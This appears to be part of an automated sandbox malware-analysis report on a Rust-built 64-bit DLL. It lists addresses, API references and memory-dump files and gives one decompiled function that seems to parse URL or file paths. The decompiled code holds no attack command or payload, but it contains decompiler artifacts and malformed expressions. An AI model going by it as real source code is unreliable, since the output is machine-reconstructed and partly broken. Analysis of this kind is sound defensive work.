0x7fef304b403
0x7fef304b40d
0x7fef304b418
0x7fef304b423
0x7fef304b42e
0x7fef304b433
0x7fef304b439
0x7fef304b442
0x7fef304b448
0x7fef304b44c
0x7fef304b453
0x7fef304b455
0x7fef304b458
0x7fef304b46d
0x7fef304b475
0x7fef304b480
0x7fef304b482
0x7fef304b48b
0x7fef304b48e
0x7fef304b491
0x7fef304b495
0x7fef304b498
0x7fef304b4a2
0x7fef304b4ac
0x7fef304b4b5
0x7fef304b4b7
0x7fef304b4ba
0x7fef304b4c5
0x7fef304b4ca
0x7fef304b4d6
0x7fef304b4d8
0x7fef304b4e0
0x7fef304b4eb
0x7fef304b4f1
0x7fef304b4fb
0x7fef304b516
0x7fef304b518
0x7fef304b522
0x7fef304b527
0x7fef304b532
0x7fef304b53a
0x7fef304b548
0x7fef304b566
0x7fef304b568
0x7fef304b56e
0x7fef304b579
0x7fef304b584
0x7fef304b594
0x7fef304b598
0x7fef304b5a9
0x7fef304b5ad
0x7fef304b5b9
0x7fef304b5c8
0x7fef304b5d1
0x7fef304b5d7
0x7fef304b5df
0x7fef304b5e7
0x7fef304b5f3
0x7fef304b5f9
0x7fef304b606
0x7fef304b60c
0x7fef304b617
0x7fef304b61c
0x7fef304b621
0x7fef304b625
0x7fef304b631
0x7fef304b647
0x7fef304b64d
0x7fef304b651
0x7fef304b655
0x7fef304b658
0x7fef304b65c
0x7fef304b661
0x7fef304b66d
0x7fef304b685
0x7fef304b691
0x7fef304b6fb
0x7fef304b709
0x7fef304b70f
0x7fef304b71b
0x7fef304b71f
0x7fef304b722
0x7fef304b726
0x7fef304b729
0x7fef304b731
0x7fef304b73c
0x7fef304b747
0x7fef304b74b
0x7fef304b753
0x7fef304b75e
0x7fef304b764
0x7fef304b76b
0x7fef304b785
0x7fef304b788
0x7fef304b792
0x7fef304b7a7
0x7fef304b7ac
0x7fef304b7b5
0x7fef304b7d5
0x7fef304b7e1
0x7fef304b7ee
0x7fef304b7f2
0x7fef304b7f5
0x7fef304b7f9
0x7fef304b7fe
0x7fef304b809
0x7fef304b80d
0x7fef304b810
0x7fef304b818
0x7fef304b820
0x7fef304b824
0x7fef304b836
0x7fef304b83b
0x7fef304b841
0x7fef304b84d
0x7fef304b851
0x7fef304b858
0x7fef304b862
0x7fef304b868
0x7fef304b870
0x7fef304b878
0x7fef304b87e
0x7fef304b88b
0x7fef304b890
0x7fef304b895
0x7fef304b8a4
0x7fef304b8b8
0x7fef304b8be
0x7fef304b8c2
0x7fef304b8c5
0x7fef304b8c7
0x7fef304b8cf
0x7fef304b8d5
0x7fef304b8d8
0x7fef304b8e5
0x7fef304b8f4
0x7fef304b8fd
0x7fef304b904
0x7fef304b90b
0x7fef304b913
0x7fef304b91b
0x7fef304b923
0x7fef304b92b
0x7fef304b933
0x7fef304b93b
0x7fef304b943
0x7fef304b95e

APIs

HeapFree.KERNEL32 ref: 000007FEF304B5C8
HeapFree.KERNEL32 ref: 000007FEF304B606
AcquireSRWLockExclusive.KERNEL32 ref: 000007FEF304B7B5
HeapFree.KERNEL32 ref: 000007FEF304B8A4
HeapFree.KERNEL32 ref: 000007FEF304B8B8
ReleaseSRWLockExclusive.KERNEL32 ref: 000007FEF304B8CF
HeapFree.KERNEL32 ref: 000007FEF304B8F4

Strings

stdoutlibrary\std\src\io\mod.rs, xrefs: 000007FEF304B740
lock count overflow in reentrant mutexlibrary\std\src\sys_common\remutex.rs, xrefs: 000007FEF304B794

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap$ExclusiveLock$AcquireRelease
String ID: lock count overflow in reentrant mutexlibrary\std\src\sys_common\remutex.rs$stdoutlibrary\std\src\io\mod.rs
API String ID: 1406246216-2078222924
Opcode ID: 516d30815781b0e92496a68e8501e0e1da1fd6e2e92ab0adc8ec87c6e503209c
Instruction ID: 6be2262b6bfd52c3dfda0ad77f52b76ecc67ec0936eddf19e0b063218de805cf
Opcode Fuzzy Hash: 516d30815781b0e92496a68e8501e0e1da1fd6e2e92ab0adc8ec87c6e503209c
Instruction Fuzzy Hash: 19821732E08B8189F7A18B39D8013B867D2EB95794F548337EE9D17BA5DB38D641E340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C0B4F Relevance: 14.3, APIs: 4, Strings: 5, Instructions: 756
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E000007FE7FEF30C0B4F(void* __edi, void* __esi, void* __ebp, void* __esp, long long __rcx, intOrPtr* __rdx, long long __r8, long long __r9) {
				void* _t264;
				void* _t266;
				void* _t275;
				char _t280;
				int _t300;
				char _t308;
				intOrPtr _t314;
				void* _t317;
				intOrPtr _t318;
				void* _t357;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t401;
				void* _t413;
				void* _t420;
				void* _t432;
				void* _t433;
				void* _t437;
				void* _t442;
				signed long long _t445;
				char* _t446;
				long long* _t447;
				signed long long _t451;
				long long _t452;
				intOrPtr _t455;
				signed long long _t457;
				char* _t464;
				signed long long _t466;
				intOrPtr _t467;
				signed long long _t472;
				signed long long _t474;
				signed long long _t477;
				intOrPtr* _t479;
				unsigned long long _t481;
				intOrPtr* _t483;
				long long _t517;
				char* _t531;
				signed long long _t543;
				signed long long _t548;
				long long _t549;
				char* _t555;
				signed long long _t565;
				signed long long _t569;
				intOrPtr _t570;
				intOrPtr* _t572;
				long long _t577;
				intOrPtr* _t580;
				long long _t581;
				long long _t582;
				intOrPtr* _t584;
				intOrPtr* _t585;
				intOrPtr* _t586;
				intOrPtr* _t587;
				intOrPtr* _t589;
				intOrPtr* _t591;
				intOrPtr* _t592;
				intOrPtr* _t593;
				intOrPtr* _t596;
				signed long long _t598;
				intOrPtr _t599;
				intOrPtr* _t600;
				signed long long _t604;
				long long _t606;
				intOrPtr _t607;
				signed long long _t611;
				signed long long _t614;
				signed long long _t618;
				intOrPtr* _t619;
				void* _t620;
				long long* _t630;
				long long _t652;
				intOrPtr _t655;
				void* _t658;
				intOrPtr* _t664;
				long long _t665;
				long long _t669;
				void* _t670;
				intOrPtr _t671;
				signed char* _t672;
				signed long long _t674;
				signed long long _t675;
				signed long long _t678;

				_t652 = __r9;
				_t369 = __ebp;
				_t367 = __esi;
				_t357 = __edi;
				_t664 = __rdx;
				_t665 = __rcx;
				bpl =  *((intOrPtr*)(_t620 + 0x1b0));
				_t589 = _t620 + 0x80;
				 *((long long*)(_t620 + 0x70)) = __r8;
				 *_t589 = __r8;
				 *((long long*)(_t620 + 0xd0)) = __r9;
				 *((long long*)(_t589 + 8)) = __r9;
				_t264 = E000007FE7FEF30BDE7C(_t589);
				r13d = _t264;
				if (_t264 == 0x5c) goto 0xf30c0bb5;
				if (r13d != 0x2f) goto 0xf30c0cf3;
				_t607 =  *((intOrPtr*)(_t664 + 0x30));
				if (r13d != 0x5c) goto 0xf30c0bd2;
				if (_t607 == 0) goto 0xf30c0bd2;
				 *((intOrPtr*)( *((intOrPtr*)(_t664 + 0x38)) + 0x28))();
				_t580 = _t620 + 0x80;
				 *_t580 =  *_t589;
				 *((long long*)(_t580 + 8)) =  *((intOrPtr*)(_t589 + 8));
				_t266 = E000007FE7FEF30BDE7C(_t580);
				_t581 =  *((intOrPtr*)(_t580 + 8));
				if (_t266 == 0x2f) goto 0xf30c0bfe;
				if (_t266 != 0x5c) goto 0xf30c0d54;
				if (_t266 != 0x5c) goto 0xf30c0c15;
				if (_t607 == 0) goto 0xf30c0c15;
				_t445 =  *((intOrPtr*)(_t664 + 0x38));
				 *((intOrPtr*)(_t445 + 0x28))();
				E000007FE7FEF3062221(_t664,  &M000007FE7FEF314D0DA, 0xf314d0e1);
				_t474 = _t620 + 0x80;
				_t543 =  *_t580;
				E000007FE7FEF30C44DE(_t607, _t474, _t543, _t581);
				sil =  *_t474;
				if ( *((char*)(_t474 + 0x18)) == 2) goto 0xf30c0ceb;
				 *((long long*)(_t620 + 0x70)) = _t665;
				_t318 =  *((intOrPtr*)(_t620 + 0x81));
				_t477 = (_t474 | _t543 << 0x00000020) << 0x00000008 | _t445;
				if ( *((intOrPtr*)(_t620 + 0x90)) == 0) goto 0xf30c1361;
				_t591 = _t620 + 0x80;
				E000007FE7FEF30BE068(( *(_t620 + 0x87) & 0x000000ff) << 0x10,  *(_t620 + 0x85) & 0x0000ffff | ( *(_t620 + 0x87) & 0x000000ff) << 0x00000010, _t357, _t591, _t477,  *((intOrPtr*)(_t620 + 0x90)));
				if ( *_t591 != 3) goto 0xf30c0f09;
				sil =  *((intOrPtr*)(_t620 + 0x81));
				if ( *((intOrPtr*)(_t620 + 0x88)) == 0) goto 0xf30c0ce6;
				HeapFree(??, ??, ??);
				 *((intOrPtr*)( *((intOrPtr*)(_t620 + 0x70)))) = sil;
				goto 0xf30c1244;
				if (_t581 == 0) goto 0xf30c0e30;
				if (r13d == 0x23) goto 0xf30c103a;
				if (r13d == 0x3f) goto 0xf30c1072;
				if (r13d != 0x110000) goto 0xf30c1085;
				if ( *((intOrPtr*)(_t581 + 0x34)) == 0) goto 0xf30c12ef;
				r9d =  *(_t581 + 0x38);
				if (_t652 == 0) goto 0xf30c15be;
				_t446 =  *((intOrPtr*)(_t581 + 0x10));
				if (_t446 - _t652 <= 0) goto 0xf30c15c3;
				if ( *((char*)( *_t581 + _t652)) - 0xbf > 0) goto 0xf30c15c9;
				goto 0xf30c1883;
				E000007FE7FEF3062221(_t664,  &M000007FE7FEF314D0DA, 0xf314d0e1);
				_t548 = _t477;
				_t275 = E000007FE7FEF30C475B( *((intOrPtr*)(_t620 + 0xa8)), _t548);
				if ( *((long long*)(_t620 + 0x1b8)) == 0) goto 0xf30c0efc;
				if (_t275 != 0) goto 0xf30c0efc;
				E000007FE7FEF30BD6A0(_t275,  *((intOrPtr*)(_t620 + 0x1b8)), 0xf314d0e1, _t652);
				if (_t548 == 0) goto 0xf30c1804;
				if ( *_t446 != 0x2f) goto 0xf30c1804;
				_t669 = _t446 + 1;
				_t549 = _t548 - 1;
				_t447 = _t620 + 0x90;
				 *((long long*)(_t447 - 0x10)) = _t581;
				 *((long long*)(_t447 - 8)) = _t549;
				 *_t447 = _t669;
				 *((long long*)(_t447 + 8)) = _t549;
				 *((long long*)(_t447 + 0x10)) = _t581;
				 *((long long*)(_t447 + 0x18)) = _t549;
				 *((long long*)(_t447 + 0x20)) = 1;
				 *((long long*)(_t447 + 0x28)) = 0x2f;
				 *((short*)(_t447 + 0x30)) = 1;
				_t592 = _t620 + 0x100;
				E000007FE7FEF30A6A7C(_t592, _t447);
				if ( *_t592 == _t581) goto 0xf30c10d6;
				_t670 = _t669 +  *((intOrPtr*)(_t620 + 0x80));
				goto 0xf30c1112;
				E000007FE7FEF3062221(_t664, 0xf314d118, 0xf314d120);
				 *((char*)(_t620 + 0x80)) = 0;
				 *(_t620 + 0x28) =  *((intOrPtr*)(_t620 + 0xd0));
				_t451 =  *((intOrPtr*)(_t620 + 0x70));
				 *(_t620 + 0x20) = _t451;
				r9d = 7;
				E000007FE7FEF30C2A68();
				 *(_t620 + 0x28) = 0xf314d118;
				 *(_t620 + 0x20) = _t451;
				_t593 = _t620 + 0x80;
				r8d = 0;
				r9d = 4;
				E000007FE7FEF30C3B13(0, _t451, _t593, _t664, _t620 + 0x80);
				_t280 =  *_t593;
				if (_t280 == 2) goto 0xf30c123a;
				 *((long long*)(_t670 + 0x10)) =  *((intOrPtr*)(_t664 + 0x10));
				asm("inc ecx");
				asm("inc ecx");
				asm("movaps xmm0, [0x4182e]");
				asm("inc ecx");
				 *(_t670 + 0x28) = 7;
				 *((intOrPtr*)(_t670 + 0x2c)) = _t280;
				 *((long long*)(_t670 + 0x30)) =  *(_t620 + 0x84);
				 *(_t670 + 0x38) =  *(_t620 + 0x8c);
				 *((short*)(_t670 + 0x3c)) = 0;
				 *((char*)(_t670 + 0x40)) = 0;
				goto 0xf30c17ef;
				 *((intOrPtr*)(_t620 + 0x7c)) = 0;
				goto 0xf30c11b8;
				r9b =  *((intOrPtr*)(_t620 + 0x81));
				 *((intOrPtr*)(_t620 + 0xd8)) =  *((intOrPtr*)(_t620 + 0x82));
				 *(_t620 + 0xdc) =  *(_t620 + 0x86) & 0x0000ffff;
				_t582 =  *((intOrPtr*)(_t620 + 0x98));
				if (_t280 != 0) goto 0xf30c0f70;
				_t401 = _t582 - 9;
				if (_t401 != 0) goto 0xf30c0f70;
				if (_t401 == 0) goto 0xf30c1340;
				_t555 = _t620 + 0x100;
				 *_t555 = _t280;
				 *((intOrPtr*)(_t555 + 1)) = r9b;
				 *((intOrPtr*)(_t555 + 2)) =  *((intOrPtr*)(_t620 + 0xd8));
				 *((short*)(_t555 + 6)) =  *(_t620 + 0xdc) & 0x0000ffff;
				 *((long long*)(_t555 + 8)) =  *((intOrPtr*)(_t620 + 0x88));
				 *((long long*)(_t555 + 0x10)) =  *((intOrPtr*)(_t620 + 0x90));
				 *((long long*)(_t555 + 0x18)) = _t582;
				_t452 = _t620 + 0x138;
				 *_t452 = _t555;
				 *((long long*)(_t452 + 8)) = 0x7fef30bd974;
				 *((long long*)(_t620 + 0x130)) = _t664;
				_t630 = _t620 + 0x80;
				 *_t630 = 0xf314d790;
				 *((long long*)(_t630 + 8)) = 0xf314d790;
				 *((long long*)(_t630 + 0x10)) = 0;
				 *((long long*)(_t630 + 0x20)) = _t452;
				 *((long long*)(_t630 + 0x28)) = 0xf314d790;
				if (E000007FE7FEF3054B50(1, _t620 + 0x130, 0xf314cca8, _t630) != 0) goto 0xf30c182e;
				asm("movups xmm0, [esp+0x100]");
				asm("movups xmm1, [esp+0x110]");
				asm("movaps [edx+0x10], xmm1");
				asm("movaps [edx], xmm0");
				_t596 = _t620 + 0xe0;
				E000007FE7FEF30BDD82( *(_t620 + 0x86) & 0x0000ffff, 1, _t452, _t596, _t620 + 0x80, _t630);
				dil = 1;
				r13b =  *_t596;
				goto 0xf30c1366;
				memcpy(0, _t367, 9);
				 *(_t620 + 0x20) =  *((intOrPtr*)(_t620 + 0xd0));
				E000007FE7FEF30C3625(_t670, _t620 + 0x80, _t582,  *((intOrPtr*)(_t620 + 0x70)));
				goto 0xf30c17ef;
				if ( *((intOrPtr*)(_t620 + 0xac)) == 0) goto 0xf30c12fb;
				goto 0xf30c1309;
				_t598 =  *((intOrPtr*)(_t620 + 0x70));
				_t611 =  *((intOrPtr*)(_t620 + 0xd0));
				if (E000007FE7FEF30C475B(_t598, _t611) == 0) goto 0xf30c12dc;
				E000007FE7FEF3062221(_t664, 0xf314d118, 0xf314d120);
				 *((char*)(_t620 + 0x80)) = 0;
				 *(_t620 + 0x28) = _t611;
				 *(_t620 + 0x20) = _t598;
				goto 0xf30c0e69;
				if ( *((char*)(_t620 + 0xc1)) != 0) goto 0xf30c1814;
				_t671 =  *((intOrPtr*)(_t620 + 0x80));
				_t455 =  *((intOrPtr*)(_t620 + 0x88));
				if ( *((char*)(_t620 + 0xc0)) != 0) goto 0xf30c1107;
				if (_t455 == _t671) goto 0xf30c1814;
				_t672 = _t671 +  *((intOrPtr*)(_t620 + 0x90));
				_t599 =  *((intOrPtr*)(_t620 + 0x1b8));
				if (_t455 - _t671 != 2) goto 0xf30c116d;
				if (( *_t672 & 0xdf) + 0xffffffbf - 0x19 > 0) goto 0xf30c116d;
				if (_t672[1] != 0x3a) goto 0xf30c116d;
				if ( *((intOrPtr*)(_t664 + 0x10)) !=  *((intOrPtr*)(_t664 + 8))) goto 0xf30c114f;
				E000007FE7FEF30A62B2( *((intOrPtr*)(_t664 + 0x10)) -  *((intOrPtr*)(_t664 + 8)), _t664,  *((intOrPtr*)(_t664 + 0x10)));
				_t457 =  *_t664;
				 *((char*)(_t457 +  *((intOrPtr*)(_t664 + 0x10)))) = 0x2f;
				 *((long long*)(_t664 + 0x10)) =  *((long long*)(_t664 + 0x10)) + 1;
				E000007FE7FEF3062221(_t664, _t672,  &(_t672[2]));
				goto 0xf30c11a8;
				E000007FE7FEF30C47F5(_t599,  &(_t672[2]),  *((intOrPtr*)(_t620 + 0x70)));
				if (_t457 == 0) goto 0xf30c11a8;
				_t565 = _t457;
				E000007FE7FEF3062221(_t664, _t565,  &(_t672[_t457]));
				_t584 =  *((intOrPtr*)(_t664 + 0x10));
				 *((intOrPtr*)(_t620 + 0x7c)) =  *((intOrPtr*)(_t599 + 0x40));
				asm("movups xmm0, [esi+0x41]");
				asm("movaps [esp+0xe0], xmm0");
				goto 0xf30c11b8;
				 *((intOrPtr*)(_t620 + 0x7c)) = 0;
				_t674 = _t611;
				r13d = r13d + 0xffffffd1;
				_t413 = r13d - 0x2d;
				bpl =  *((intOrPtr*)(_t620 + 0x1b0));
				if (_t413 > 0) goto 0xf30c11e7;
				asm("dec esp");
				if (_t413 >= 0) goto 0xf30c11e7;
				_t678 =  *((intOrPtr*)(_t620 + 0x70));
				 *((char*)(_t620 + 0x80)) = 0;
				 *(_t620 + 0x28) =  *((intOrPtr*)(_t620 + 0xd0));
				 *(_t620 + 0x20) = _t678;
				_t479 = _t584;
				E000007FE7FEF30C2A68();
				 *(_t620 + 0x28) = _t565;
				 *(_t620 + 0x20) = 0x10001;
				_t600 = _t620 + 0x80;
				r8d = _t369;
				r9d = 4;
				E000007FE7FEF30C3B13(0, 0x10001, _t600, _t664, _t620 + 0x80);
				if ( *_t600 != 2) goto 0xf30c1270;
				 *_t674 =  *(_t620 + 0x84);
				 *(_t674 + 0x2c) = 2;
				if ( *((long long*)(_t664 + 8)) == 0) goto 0xf30c17ef;
				_t300 = HeapFree(??, ??, ??);
				goto 0xf30c17ef;
				_t517 =  *(_t620 + 0x84);
				 *((long long*)(_t674 + 0x10)) =  *((intOrPtr*)(_t664 + 0x10));
				asm("inc ecx");
				asm("inc ecx");
				asm("movaps xmm0, [esp+0xe0]");
				asm("inc ecx");
				 *((long long*)(_t674 + 0x18)) = 0x4;
				 *(_t674 + 0x20) = 7;
				 *((intOrPtr*)(_t674 + 0x24)) = _t318;
				 *((intOrPtr*)(_t674 + 0x28)) = _t318;
				 *(_t674 + 0x2c) = _t300;
				 *((long long*)(_t674 + 0x30)) = _t517;
				 *(_t674 + 0x38) =  *(_t620 + 0x8c);
				 *((short*)(_t674 + 0x3c)) = 0;
				 *((char*)(_t674 + 0x40)) =  *((intOrPtr*)(_t620 + 0x7c));
				goto 0xf30c17ef;
				if ( *((intOrPtr*)(_t584 + 0x2c)) == 0) goto 0xf30c1625;
				goto 0xf30c1633;
				_t655 =  *((intOrPtr*)(_t584 + 0x10));
				goto 0xf30c15c9;
				if ( *((intOrPtr*)(_t584 + 0x34)) == 0) goto 0xf30c165f;
				r9d =  *(_t584 + 0x38);
				if (_t655 == 0) goto 0xf30c132d;
				if ( *((intOrPtr*)(_t584 + 0x10)) - _t655 <= 0) goto 0xf30c1335;
				_t420 =  *((char*)( *_t584 + _t655)) - 0xbf;
				if (_t420 > 0) goto 0xf30c1666;
				goto 0xf30c171b;
				r9d = 0;
				goto 0xf30c1666;
				if (_t420 == 0) goto 0xf30c1666;
				goto 0xf30c171b;
				 *((char*)(_t620 + 0xe0)) = 0;
				if (_t517 == 0) goto 0xf30c1361;
				r13d = 0;
				HeapFree(??, ??, ??);
				goto 0xf30c1364;
				r13d = 0;
				asm("movups xmm0, [esp+0xe1]");
				asm("movaps [esp+0x120], xmm0");
				if (0x4 == 0) goto 0xf30c138d;
				HeapFree(??, ??, ??);
				asm("movaps xmm0, [esp+0x120]");
				asm("movaps [esp+0x100], xmm0");
				_t614 =  *((intOrPtr*)(_t664 + 0x10));
				_t480 =  ==  ? _t614 << 0x00000020 | 0x00000900 : _t479;
				if (0x901 != 0) goto 0xf30c13f7;
				_t481 = ( ==  ? _t614 << 0x00000020 | 0x00000900 : _t479) >> 0x20;
				 *((char*)(_t620 + 0xe0)) = r13b != 0;
				if (dil == 0) goto 0xf30c140b;
				 *(_t620 + 0x20) = _t678;
				E000007FE7FEF30C4374(0, _t664,  *_t584, _t620 + 0xe0, _t674);
				goto 0xf30c1451;
				_t464 =  *((intOrPtr*)(_t620 + 0x70));
				 *_t464 = 9;
				 *(_t464 + 0x2c) = 2;
				goto 0xf30c124c;
				if (_t614 !=  *((intOrPtr*)(_t664 + 8))) goto 0xf30c1425;
				_t569 = _t614;
				E000007FE7FEF30A62B2(_t614 -  *((intOrPtr*)(_t664 + 8)), _t664, _t569);
				_t466 =  *((intOrPtr*)(_t664 + 0x10));
				 *((char*)( *_t664 + _t466)) = 0x2f;
				 *((long long*)(_t664 + 0x10)) =  *((long long*)(_t664 + 0x10)) + 1;
				 *(_t620 + 0x28) = _t678;
				 *(_t620 + 0x20) = _t674;
				E000007FE7FEF30C2A68();
				_t675 = _t466;
				if ( *((char*)(_t620 + 0xe0)) != 0) goto 0xf30c150d;
				if (0x901 - 7 < 0) goto 0xf30c185c;
				_t570 =  *((intOrPtr*)(_t664 + 0x10));
				if (_t570 - _t481 < 0) goto 0xf30c1872;
				_t467 =  *_t664;
				if (_t570 - 7 <= 0) goto 0xf30c14a4;
				_t432 =  *((char*)(_t467 + 7)) - 0xc0;
				if (_t432 >= 0) goto 0xf30c14a6;
				goto 0xf30c1827;
				if (_t432 != 0) goto 0xf30c148c;
				if (_t432 <= 0) goto 0xf30c14cc;
				_t433 =  *((char*)(_t467 + _t481)) - 0xbf;
				if (_t433 > 0) goto 0xf30c14ce;
				goto 0xf30c1827;
				if (_t433 != 0) goto 0xf30c14b4;
				 *((long long*)(_t664 + 0x10)) = 7;
				if (_t481 != 7) goto 0xf30c14e5;
				if (_t570 != 7) goto 0xf30c14fc;
				goto 0xf30c1505;
				if (_t570 == _t481) goto 0xf30c1505;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t664 + 0x10)) = _t570 - _t481 + 7;
				r13d = 0;
				 *(_t620 + 0x28) = _t569;
				 *(_t620 + 0x20) = _t675;
				_t604 = _t620 + 0x80;
				_t572 = _t664;
				r8b =  *((intOrPtr*)(_t620 + 0x1b0));
				r9d = 4;
				E000007FE7FEF30C3B13(0x2c, _t467, _t604, _t572, _t570 - _t481);
				_t437 =  *_t604 - 2;
				if (_t437 != 0) goto 0xf30c1559;
				_t308 =  *(_t620 + 0x84);
				_t531 =  *((intOrPtr*)(_t620 + 0x70));
				 *_t531 = _t308;
				 *(_t531 + 0x2c) = 2;
				goto 0xf30c124c;
				_t585 =  *((intOrPtr*)(_t620 + 0x70));
				 *((long long*)(_t585 + 0x10)) =  *((intOrPtr*)(_t664 + 0x10));
				asm("inc ecx");
				asm("movups [edi], xmm0");
				asm("movaps xmm0, [esp+0x100]");
				asm("movups [edi+0x41], xmm0");
				 *(_t585 + 0x18) = 0x4;
				 *(_t585 + 0x20) = 7;
				 *(_t585 + 0x24) = 7;
				 *(_t585 + 0x28) = 7;
				 *((intOrPtr*)(_t585 + 0x2c)) = _t308;
				 *((long long*)(_t585 + 0x30)) =  *(_t620 + 0x84);
				 *(_t585 + 0x38) =  *(_t620 + 0x8c);
				 *((short*)(_t585 + 0x3c)) = 0;
				 *((intOrPtr*)(_t585 + 0x40)) = r13b;
				goto 0xf30c17ef;
				r9d = 0;
				goto 0xf30c15c9;
				if (_t437 != 0) goto 0xf30c1883;
				_t658 = _t614 + _t572;
				E000007FE7FEF3062221(_t664, _t572, _t658);
				 *(_t675 + 0x10) =  *((intOrPtr*)(_t664 + 0x10));
				asm("inc ecx");
				asm("inc ecx");
				asm("movups xmm0, [edi+0x18]");
				asm("movups xmm1, [edi+0x40]");
				asm("inc ecx");
				 *((char*)(_t675 + 0x50)) =  *((intOrPtr*)(_t585 + 0x50));
				asm("inc ecx");
				 *(_t675 + 0x28) =  *(_t585 + 0x28);
				 *((long long*)(_t675 + 0x2c)) =  *((intOrPtr*)(_t585 + 0x2c));
				 *((intOrPtr*)(_t675 + 0x34)) = 0;
				 *((intOrPtr*)(_t675 + 0x3c)) =  *((intOrPtr*)(_t585 + 0x3c));
				goto 0xf30c17ef;
				if ( *((intOrPtr*)(_t585 + 0x34)) == 0) goto 0xf30c1727;
				r9d =  *(_t585 + 0x38);
				if (_t658 == 0) goto 0xf30c172e;
				if ( *((intOrPtr*)(_t585 + 0x10)) - _t658 <= 0) goto 0xf30c1719;
				if ( *((char*)( *_t585 + _t658)) - 0xbf > 0) goto 0xf30c172e;
				goto 0xf30c171b;
				E000007FE7FEF3062221(_t664,  *_t585,  *((intOrPtr*)(_t585 + 0x10)) +  *_t585);
				_t368 =  *(_t585 + 0x18);
				 *(_t620 + 0x28) =  *((intOrPtr*)(_t620 + 0xd0));
				_t472 =  *((intOrPtr*)(_t620 + 0x70));
				 *(_t620 + 0x20) = _t472;
				_t483 = _t585;
				_t586 = _t620 + 0x80;
				r8d = _t369;
				r9d = _t368;
				E000007FE7FEF30C3B13( *(_t620 + 0x8c), _t472, _t586, _t664,  *((intOrPtr*)(_t585 + 0x10)) +  *_t585);
				_t314 =  *_t586;
				_t442 = _t314 - 2;
				if (_t442 == 0) goto 0xf30c123a;
				r9d =  *(_t620 + 0x84);
				_t618 =  *((intOrPtr*)(_t664 + 0x10));
				 *(_t675 + 0x10) = _t618;
				asm("inc ecx");
				asm("inc ecx");
				_t587 =  *((intOrPtr*)(_t483 + 0x20));
				asm("movups xmm0, [ebx+0x40]");
				asm("inc ecx");
				 *((char*)(_t675 + 0x50)) =  *((intOrPtr*)(_t483 + 0x50));
				 *(_t675 + 0x18) = _t368;
				 *((intOrPtr*)(_t675 + 0x1c)) =  *((intOrPtr*)(_t483 + 0x1c));
				 *((long long*)(_t675 + 0x20)) = _t587;
				 *(_t675 + 0x28) =  *(_t483 + 0x28);
				 *((intOrPtr*)(_t675 + 0x2c)) = _t314;
				 *(_t675 + 0x30) = r9d;
				 *((long long*)(_t675 + 0x34)) =  *((intOrPtr*)(_t620 + 0x88));
				 *((intOrPtr*)(_t675 + 0x3c)) =  *((intOrPtr*)(_t483 + 0x3c));
				goto 0xf30c17ef;
				if (_t442 == 0) goto 0xf30c172e;
				goto 0xf30c188a;
				_t577 =  *_t587;
				E000007FE7FEF30C3FC7(E000007FE7FEF3062221(_t664, _t577,  *((intOrPtr*)(_t587 + 0x10)) + _t577), _t664, _t483);
				 *((char*)(_t620 + 0x80)) = 1;
				 *(_t620 + 0x28) = _t618;
				 *(_t620 + 0x20) = _t604;
				E000007FE7FEF30C2A68();
				_t619 = _t587;
				_t317 = memcpy(0, _t368, 9);
				r9d =  *(_t619 + 0x18);
				r10d =  *(_t619 + 0x1c);
				r11d =  *(_t619 + 0x20);
				r15d =  *((intOrPtr*)(_t619 + 0x24));
				_t606 = _t620 + 0x100;
				 *((char*)(_t606 + 0x10)) =  *((intOrPtr*)(_t619 + 0x50));
				asm("movups xmm0, [ebp+0x40]");
				asm("movaps [esi], xmm0");
				 *((long long*)(_t620 + 0x60)) = _t577;
				 *(_t620 + 0x58) = _t472;
				 *((intOrPtr*)(_t620 + 0x50)) =  *((intOrPtr*)(_t587 + 0x28));
				 *((short*)(_t620 + 0x48)) =  *(_t619 + 0x3e) & 0x0000ffff;
				 *((short*)(_t620 + 0x40)) =  *(_t619 + 0x3c) & 0x0000ffff;
				 *((long long*)(_t620 + 0x38)) = _t606;
				 *((intOrPtr*)(_t620 + 0x30)) = r15d;
				 *(_t620 + 0x28) = r11d;
				 *(_t620 + 0x20) = r10d;
				r8d = 0;
				E000007FE7FEF30C3504();
				return _t317;
			}

0x7fef30c0b4f
0x7fef30c0b4f
0x7fef30c0b4f
0x7fef30c0b4f
0x7fef30c0b62
0x7fef30c0b65
0x7fef30c0b70
0x7fef30c0b78
0x7fef30c0b80
0x7fef30c0b85
0x7fef30c0b88
0x7fef30c0b90
0x7fef30c0b97
0x7fef30c0b9c
0x7fef30c0ba9
0x7fef30c0baf
0x7fef30c0bb5
0x7fef30c0bbe
0x7fef30c0bc3
0x7fef30c0bcf
0x7fef30c0bd2
0x7fef30c0bda
0x7fef30c0bdd
0x7fef30c0be4
0x7fef30c0bec
0x7fef30c0bf3
0x7fef30c0bf8
0x7fef30c0c01
0x7fef30c0c06
0x7fef30c0c08
0x7fef30c0c12
0x7fef30c0c26
0x7fef30c0c2b
0x7fef30c0c36
0x7fef30c0c3c
0x7fef30c0c41
0x7fef30c0c48
0x7fef30c0c4e
0x7fef30c0c70
0x7fef30c0c9e
0x7fef30c0ca4
0x7fef30c0caa
0x7fef30c0cb8
0x7fef30c0cc1
0x7fef30c0cc7
0x7fef30c0cd2
0x7fef30c0ce0
0x7fef30c0ceb
0x7fef30c0cee
0x7fef30c0cf6
0x7fef30c0d00
0x7fef30c0d0a
0x7fef30c0d17
0x7fef30c0d21
0x7fef30c0d27
0x7fef30c0d31
0x7fef30c0d37
0x7fef30c0d3e
0x7fef30c0d49
0x7fef30c0d4f
0x7fef30c0d65
0x7fef30c0d6d
0x7fef30c0d70
0x7fef30c0d83
0x7fef30c0d8b
0x7fef30c0d9c
0x7fef30c0da4
0x7fef30c0db0
0x7fef30c0db6
0x7fef30c0db9
0x7fef30c0dbe
0x7fef30c0dc6
0x7fef30c0dca
